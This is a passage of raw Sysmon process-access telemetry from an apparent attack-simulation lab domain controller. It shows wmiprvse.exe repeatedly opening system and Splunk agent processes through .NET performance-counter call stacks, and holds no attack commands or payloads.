L+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006430Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006429Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006428Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006427Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006426Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006425Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006424Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006423Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8500-000000009101}4616C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006422Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006421Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006420Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006419Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006418Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006417Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006416Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006415Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006414Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006413Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006412Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006411Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006410Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006409Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006408Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006407Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006406Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 